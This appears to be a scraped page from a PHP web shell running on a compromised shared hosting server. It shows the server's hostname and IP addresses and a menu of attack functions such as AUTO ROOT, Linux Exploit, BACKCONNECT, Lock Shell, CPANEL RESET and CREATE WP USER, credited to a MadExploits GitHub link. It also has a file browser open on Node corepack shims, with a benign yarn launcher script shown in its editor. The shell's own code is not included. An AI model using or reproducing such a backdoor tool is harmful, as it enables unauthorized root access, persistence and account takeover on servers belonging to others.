Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.133.135.8
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
corepack /
shims /
nodewin /
[ HOME SHELL ]
Name
Size
Permission
Action
corepack
322
B
-rw-r--r--
corepack.cmd
218
B
-rw-r--r--
corepack.ps1
865
B
-rw-r--r--
npm
312
B
-rw-r--r--
npm.cmd
208
B
-rw-r--r--
npm.ps1
845
B
-rw-r--r--
npx
312
B
-rw-r--r--
npx.cmd
208
B
-rw-r--r--
npx.ps1
845
B
-rw-r--r--
pnpm
314
B
-rw-r--r--
pnpm.cmd
210
B
-rw-r--r--
pnpm.ps1
849
B
-rw-r--r--
pnpx
314
B
-rw-r--r--
pnpx.cmd
210
B
-rw-r--r--
pnpx.ps1
849
B
-rw-r--r--
yarn
314
B
-rw-r--r--
yarn.cmd
210
B
-rw-r--r--
yarn.ps1
849
B
-rw-r--r--
yarnpkg
320
B
-rw-r--r--
yarnpkg.cmd
216
B
-rw-r--r--
yarnpkg.ps1
861
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : yarn
#!/bin/sh basedir=$(dirname "$(echo "$0" | sed -e 's,\\,/,g')") case `uname` in *CYGWIN*) basedir=`cygpath -w "$basedir"`;; esac if [ -x "$basedir/node" ]; then exec "$basedir/node" "$basedir/node_modules/corepack/dist/yarn.js" "$@" else exec node "$basedir/node_modules/corepack/dist/yarn.js" "$@" fi
Close